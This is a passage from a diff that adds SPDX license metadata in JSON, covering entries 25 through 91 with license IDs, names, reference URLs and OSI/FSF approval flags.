+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
+      "referenceNumber": 25,
+      "name": "Adobe Systems Incorporated Source Code License Agreement",
+      "licenseId": "Adobe-2006",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Net-SNMP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
+      "referenceNumber": 26,
+      "name": "Net-SNMP License",
+      "licenseId": "Net-SNMP",
+      "seeAlso": [
+        "http://net-snmp.sourceforge.net/about/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
+      "referenceNumber": 27,
+      "name": "Creative Commons Attribution Share Alike 4.0 International",
+      "licenseId": "CC-BY-SA-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/YPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
+      "referenceNumber": 28,
+      "name": "Yahoo! Public License v1.0",
+      "licenseId": "YPL-1.0",
+      "seeAlso": [
+        "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Nunit.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/Nunit.json",
+      "referenceNumber": 29,
+      "name": "Nunit License",
+      "licenseId": "Nunit",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Nunit"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MITNFA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
+      "referenceNumber": 30,
+      "name": "MIT +no-false-attribs license",
+      "licenseId": "MITNFA",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MITNFA"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/PHP-3.01.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
+      "referenceNumber": 31,
+      "name": "PHP License v3.01",
+      "licenseId": "PHP-3.01",
+      "seeAlso": [
+        "http://www.php.net/license/3_01.txt"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
+      "referenceNumber": 32,
+      "name": "BSD Source Code Attribution",
+      "licenseId": "BSD-Source-Code",
+      "seeAlso": [
+        "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
+      "referenceNumber": 33,
+      "name": "Creative Commons Attribution Share Alike 2.5 Generic",
+      "licenseId": "CC-BY-SA-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Motosoto.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
+      "referenceNumber": 34,
+      "name": "Motosoto License",
+      "licenseId": "Motosoto",
+      "seeAlso": [
+        "https://opensource.org/licenses/Motosoto"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
+      "referenceNumber": 35,
+      "name": "Open Software License 1.1",
+      "licenseId": "OSL-1.1",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/OSL1.1"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NGPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NGPL.json",
+      "referenceNumber": 36,
+      "name": "Nethack General Public License",
+      "licenseId": "NGPL",
+      "seeAlso": [
+        "https://opensource.org/licenses/NGPL"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
+      "referenceNumber": 37,
+      "name": "Creative Commons Attribution 2.5 Australia",
+      "licenseId": "CC-BY-2.5-AU",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/2.5/au/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Unicode-TOU.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
+      "referenceNumber": 38,
+      "name": "Unicode Terms of Use",
+      "licenseId": "Unicode-TOU",
+      "seeAlso": [
+        "http://www.unicode.org/copyright.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
+      "referenceNumber": 39,
+      "name": "BSD 3-Clause No Nuclear License",
+      "licenseId": "BSD-3-Clause-No-Nuclear-License",
+      "seeAlso": [
+        "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
+      "referenceNumber": 40,
+      "name": "Open Publication License v1.0",
+      "licenseId": "OPUBL-1.0",
+      "seeAlso": [
+        "http://opencontent.org/openpub/",
+        "https://www.debian.org/opl",
+        "https://www.ctan.org/license/opl"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
+      "referenceNumber": 41,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
+      "licenseId": "CC-BY-NC-SA-2.0-UK",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NLOD-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
+      "referenceNumber": 42,
+      "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
+      "licenseId": "NLOD-2.0",
+      "seeAlso": [
+        "http://data.norge.no/nlod/en/2.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/gnuplot.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
+      "referenceNumber": 43,
+      "name": "gnuplot License",
+      "licenseId": "gnuplot",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Gnuplot"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/EPICS.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EPICS.json",
+      "referenceNumber": 44,
+      "name": "EPICS Open License",
+      "licenseId": "EPICS",
+      "seeAlso": [
+        "https://epics.anl.gov/license/open.php"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Info-ZIP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
+      "referenceNumber": 45,
+      "name": "Info-ZIP License",
+      "licenseId": "Info-ZIP",
+      "seeAlso": [
+        "http://www.info-zip.org/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
+      "referenceNumber": 46,
+      "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
+      "licenseId": "OLDAP-2.0",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
+      "referenceNumber": 47,
+      "name": "CERN Open Hardware Licence Version 2 - Permissive",
+      "licenseId": "CERN-OHL-P-2.0",
+      "seeAlso": [
+        "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
+      "referenceNumber": 48,
+      "name": "BSD 3-Clause No Nuclear Warranty",
+      "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
+      "seeAlso": [
+        "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AML.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AML.json",
+      "referenceNumber": 49,
+      "name": "Apple MIT License",
+      "licenseId": "AML",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
+      "referenceNumber": 50,
+      "name": "Mulan Permissive Software License, Version 1",
+      "licenseId": "MulanPSL-1.0",
+      "seeAlso": [
+        "https://license.coscl.org.cn/MulanPSL/",
+        "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Multics.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Multics.json",
+      "referenceNumber": 51,
+      "name": "Multics License",
+      "licenseId": "Multics",
+      "seeAlso": [
+        "https://opensource.org/licenses/Multics"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/VSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
+      "referenceNumber": 52,
+      "name": "Vovida Software License v1.0",
+      "licenseId": "VSL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/VSL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/RSA-MD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
+      "referenceNumber": 53,
+      "name": "RSA Message-Digest License",
+      "licenseId": "RSA-MD",
+      "seeAlso": [
+        "http://www.faqs.org/rfcs/rfc1321.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-PDDC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
+      "referenceNumber": 54,
+      "name": "Creative Commons Public Domain Dedication and Certification",
+      "licenseId": "CC-PDDC",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/publicdomain/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
+      "referenceNumber": 55,
+      "name": "Creative Commons Attribution Share Alike 2.1 Japan",
+      "licenseId": "CC-BY-SA-2.1-JP",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPPL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
+      "referenceNumber": 56,
+      "name": "LaTeX Project Public License v1.2",
+      "licenseId": "LPPL-1.2",
+      "seeAlso": [
+        "http://www.latex-project.org/lppl/lppl-1-2.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Spencer-94.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
+      "referenceNumber": 57,
+      "name": "Spencer License 94",
+      "licenseId": "Spencer-94",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
+      "referenceNumber": 58,
+      "name": "Open LDAP Public License v1.2",
+      "licenseId": "OLDAP-1.2",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
+      "referenceNumber": 59,
+      "name": "Open Use of Data Agreement v1.0",
+      "licenseId": "O-UDA-1.0",
+      "seeAlso": [
+        "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
+        "https://cdla.dev/open-use-of-data-agreement-v1-0/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
+      "referenceNumber": 60,
+      "name": "Open LDAP Public License v2.7",
+      "licenseId": "OLDAP-2.7",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Glulxe.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
+      "referenceNumber": 61,
+      "name": "Glulxe License",
+      "licenseId": "Glulxe",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Glulxe"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/iMatix.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/iMatix.json",
+      "referenceNumber": 62,
+      "name": "iMatix Standard Function Library Agreement",
+      "licenseId": "iMatix",
+      "seeAlso": [
+        "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
+      "referenceNumber": 63,
+      "name": "TAPR Open Hardware License v1.0",
+      "licenseId": "TAPR-OHL-1.0",
+      "seeAlso": [
+        "https://www.tapr.org/OHL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NBPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
+      "referenceNumber": 64,
+      "name": "Net Boolean Public License v1",
+      "licenseId": "NBPL-1.0",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
+      "referenceNumber": 65,
+      "name": "Licence Libre du Québec – Réciprocité version 1.1",
+      "licenseId": "LiLiQ-R-1.1",
+      "seeAlso": [
+        "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
+        "http://opensource.org/licenses/LiLiQ-R-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Noweb.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Noweb.json",
+      "referenceNumber": 66,
+      "name": "Noweb License",
+      "licenseId": "Noweb",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Noweb"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC0-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
+      "referenceNumber": 67,
+      "name": "Creative Commons Zero v1.0 Universal",
+      "licenseId": "CC0-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-Protection.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
+      "referenceNumber": 68,
+      "name": "BSD Protection License",
+      "licenseId": "BSD-Protection",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
+      "referenceNumber": 69,
+      "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
+      "licenseId": "CC-BY-NC-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Zlib.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Zlib.json",
+      "referenceNumber": 70,
+      "name": "zlib License",
+      "licenseId": "Zlib",
+      "seeAlso": [
+        "http://www.zlib.net/zlib_license.html",
+        "https://opensource.org/licenses/Zlib"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
+      "referenceNumber": 71,
+      "name": "GNU Free Documentation License v1.3 or later - invariants",
+      "licenseId": "GFDL-1.3-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
+      "referenceNumber": 72,
+      "name": "Creative Commons Attribution 3.0 Austria",
+      "licenseId": "CC-BY-3.0-AT",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/3.0/at/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
+      "referenceNumber": 73,
+      "name": "LaTeX Project Public License v1.3c",
+      "licenseId": "LPPL-1.3c",
+      "seeAlso": [
+        "http://www.latex-project.org/lppl/lppl-1-3c.txt",
+        "https://opensource.org/licenses/LPPL-1.3c"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/EPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
+      "referenceNumber": 74,
+      "name": "Eclipse Public License 1.0",
+      "licenseId": "EPL-1.0",
+      "seeAlso": [
+        "http://www.eclipse.org/legal/epl-v10.html",
+        "https://opensource.org/licenses/EPL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
+      "referenceNumber": 75,
+      "name": "GNU Free Documentation License v1.1 or later - invariants",
+      "licenseId": "GFDL-1.1-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
+      "referenceNumber": 76,
+      "name": "ANTLR Software Rights Notice with license fallback",
+      "licenseId": "ANTLR-PD-fallback",
+      "seeAlso": [
+        "http://www.antlr2.org/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
+      "referenceNumber": 77,
+      "name": "Open LDAP Public License v2.4",
+      "licenseId": "OLDAP-2.4",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
+      "referenceNumber": 78,
+      "name": "Open LDAP Public License v2.3",
+      "licenseId": "OLDAP-2.3",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ZPL-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
+      "referenceNumber": 79,
+      "name": "Zope Public License 2.1",
+      "licenseId": "ZPL-2.1",
+      "seeAlso": [
+        "http://old.zope.org/Resources/ZPL/"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Apache-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
+      "referenceNumber": 80,
+      "name": "Apache License 2.0",
+      "licenseId": "Apache-2.0",
+      "seeAlso": [
+        "https://www.apache.org/licenses/LICENSE-2.0",
+        "https://opensource.org/licenses/Apache-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
+      "referenceNumber": 81,
+      "name": "SGI Free Software License B v2.0",
+      "licenseId": "SGI-B-2.0",
+      "seeAlso": [
+        "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
+      "referenceNumber": 82,
+      "name": "Hippocratic License 2.1",
+      "licenseId": "Hippocratic-2.1",
+      "seeAlso": [
+        "https://firstdonoharm.dev/version/2/1/license.html",
+        "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
+      "referenceNumber": 83,
+      "name": "Creative Commons Attribution Share Alike 3.0 Germany",
+      "licenseId": "CC-BY-SA-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
+      "referenceNumber": 84,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
+      "licenseId": "CC-BY-NC-SA-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
+      "referenceNumber": 85,
+      "name": "GNU Lesser General Public License v2.1 or later",
+      "licenseId": "LGPL-2.1-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+        "https://opensource.org/licenses/LGPL-2.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
+      "referenceNumber": 86,
+      "name": "Creative Commons Attribution 3.0 United States",
+      "licenseId": "CC-BY-3.0-US",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/3.0/us/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/TCP-wrappers.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
+      "referenceNumber": 87,
+      "name": "TCP Wrappers License",
+      "licenseId": "TCP-wrappers",
+      "seeAlso": [
+        "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
+      "referenceNumber": 88,
+      "name": "GNU Free Documentation License v1.2 or later - invariants",
+      "licenseId": "GFDL-1.2-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Eurosym.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
+      "referenceNumber": 89,
+      "name": "Eurosym License",
+      "licenseId": "Eurosym",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Eurosym"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
+      "referenceNumber": 90,
+      "name": "GNU Free Documentation License v1.1",
+      "licenseId": "GFDL-1.1",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
+      "referenceNumber": 91,
